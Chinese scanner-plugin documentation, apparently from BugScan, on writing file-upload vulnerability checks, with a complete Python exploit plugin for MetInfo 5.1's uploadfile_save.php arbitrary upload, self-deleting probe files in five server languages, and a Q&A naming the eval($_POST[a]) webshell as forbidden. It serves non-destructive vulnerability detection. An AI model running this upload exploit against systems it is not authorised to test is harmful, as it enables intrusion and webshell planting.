文件上传类

文件上传类插件可以分两种方法进行上传:

  • raw (推荐)

    直接发送 HTTP 原始报文,可直接从 BurpSuite 中复制该报文,使用 hackhttp 的 raw 发包形式来上传文件。

  • post

    通过构造 enctype="multipart/form-data" 形式的 form 表单来上传文件。

    由于 MIME 类型较多,在处理时比较麻烦,官方推荐使用 raw 形式上传文件。

范例插件

MetInfo5.1 /feedback/uploadfile_save.php 任意文件上传

感谢插件作者: wonderkun

  1. #!/usr/bin/evn python
  2. # -*-:coding:utf-8 -*-
  3. # Author: wonderkun
  4. # Name: MetInfo5.1 任意文件上传 getshell
  5. # Refer: http://www.wooyun.org/bugs/wooyun-2015-0139168
  6. # Data: 2015/12/15
  8. import time
  10. def assign(service,arg):
  11.     if service == fingerprint.metinfo:
  12.         return True, arg
  14. def audit(arg):
  15.     url = arg + "feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo"
  17.     raw = '''
  18. POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1
  19. Host: localhost
  20. Content-Length: 423
  21. Cache-Control: max-age=0
  22. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  23. Origin: null
  24. Upgrade-Insecure-Requests: 1
  25. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
  26. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE1toBNeESf6p0uXQ
  27. Accept-Encoding: gzip, deflate
  28. Accept-Language: zh-CN,zh;q=0.8
  29. Cookie: PHPSESSID=hfqa37uap92gdaoc2nsco6g0n1
  31. ------WebKitFormBoundaryE1toBNeESf6p0uXQ
  32. Content-Disposition: form-data; name="fd_para[1][para]"
  34. filea
  35. ------WebKitFormBoundaryE1toBNeESf6p0uXQ
  36. Content-Disposition: form-data; name="fd_para[1][type]"
  38. 5
  39. ------WebKitFormBoundaryE1toBNeESf6p0uXQ
  40. Content-Disposition: form-data; name="filea"; filename="test.php"
  41. Content-Type: application/x-php
  43. <?php echo md5(1);unlink(__FILE__);?>
  44. ------WebKitFormBoundaryE1toBNeESf6p0uXQ--
  45.     '''
  46.     # proxy=('127.0.0.1',8080)
  47.     code1, head1, res1, finalurl1, log1 = hackhttp.http(url, raw=raw)
  49.     # get upload file name
  50.     name = int(time.time())
  51.     for i in range(3):
  52.         filename = name + i
  53.         url = arg + 'upload/file/%s.php' % (str(filename))
  54.         code2, head2, res2, finalurl2, log2 = hackhttp.http(url)
  55.         if code2 == 200 and "c4ca4238a0b923820dcc509a6f75849b" in res2:
  56.             # 只用传递触发漏洞的 log,验证上传成功的 log 不需要
  57.             security_hole('file upload Vulnerable:' + arg + "feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo", log=log1)
  58.             break
  59. if __name__ == '__main__':
  60.     from dummy import *
  61.     audit(assign(fingerprint.metinfo, "http://127.0.0.1/metinfo5.1/")[1])

文件上传类插件检测步骤

  1. 上传指定文件到目标
  2. 访问上传后的文件
  3. 判断是不是 1 中上传的文件

文件上传类的插件原则

  1. 一般情况下要求上传可执行的文件,例如:php, asp, aspx, jsp
  2. 上传文件内容要求对目标不得造成任何形式的损害。
  3. 上传后的文件,在访问一次之后应该自删除。
  4. 文件名应该尽量随机,不要与正常文件名相同。

上传文件样例代码

BugScan 社区官方提供了以下几类语言的上传检测样本,供开发者参考,所有文件都会在访问一次之后自删除,如果无删除权限时,由于其只输出字符串,也不会造成太大危害。

  • PHP

    1.   <?php echo md5(233);unlink(__FILE__);?>

    输出: e165421110ba03099a1c0393373c5b43

  • ASP

    1.   <%
    2.   Response.Write chr(101)&chr(49)&chr(54)&chr(53)&chr(52)&chr(50)&chr(49)&chr(49)&chr(49)&chr(48)&chr(98)&chr(97)&chr(48)&chr(51)&chr(48)&chr(57)&chr(57)&chr(97)&chr(49)&chr(99)&chr(48)&chr(51)&chr(57)&chr(51)&chr(51)&chr(55)&chr(51)&chr(99)&chr(53)&chr(98)&chr(52)&chr(51)
    3.   CreateObject("Scripting.FileSystemObject").DeleteFile(server.mappath(Request.ServerVariables("SCRIPT_NAME")))
    4.   %>

    访问该文件后输出: e165421110ba03099a1c0393373c5b43

  • ASPX

    1.   <%@Page Language="C#"%>
    2.   <%
    3.   Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
    4.   System.IO.File.Delete(Request.PhysicalPath);
    5.   %>

    访问该文件后输出:e165421110ba03099a1c0393373c5b43

  • JSP

    1.   <%
    2.   out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
    3.   new java.io.File(application.getRealPath(request.getServletPath())).delete();
    4.   %>

    访问该文件后输出:e165421110ba03099a1c0393373c5b43

  • JSPX

    1. <?xml version="1.0" encoding="UTF-8"?>
    2. <jsp:root xmlns="http://www.w3.org/1999/xhtml" version="2.0"  xmlns:jsp="http://java.sun.com/JSP/Page" xmlns:c="http://java.sun.com/jsp/jstl/core">  
    3. <jsp:directive.page contentType="text/html;charset=UTF-8" language="java" />  
    4. <jsp:scriptlet> 
    5. out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
    6. new java.io.File(application.getRealPath(request.getServletPath())).delete();
    7. </jsp:scriptlet>
    8. </jsp:root>

    访问该文件后输出:e165421110ba03099a1c0393373c5b43

文件上传 Q & A

Q: 为什么不能上传 eval($_POST[a]);?

A: 上传 webshell 会对目标造成危害,违反了无损扫描这一约定,并且上传内容中包含后门特征,容易被防护产品拦截。

Q: 为什么不能上传 phpinfo();?

A: phpinfo();看起来无害实际上却有着泄漏目标服务敏感信息的危害。如果在检测后忘记删除文件,会对其它攻击者提供便利。

Q: 为什么要自删除?

A: 自删除可保证在检测之后不会在目标系统中留下检测时产生的文件,对目标影响较小。如果上传的件名不是随机的,在下次上传时会出现写入不成功的情况。

Q: 为什么文件名要随机?

A: 文件名随机在检测没有重命名处理的上传点时好处有:

  1. 如果文件名与现有的文件同名,写入会失败或者覆盖原文件。
  2. 第一次检测上传成功,在修复漏洞后忘记删除该文件,下次检测时访问该文件会产生误报。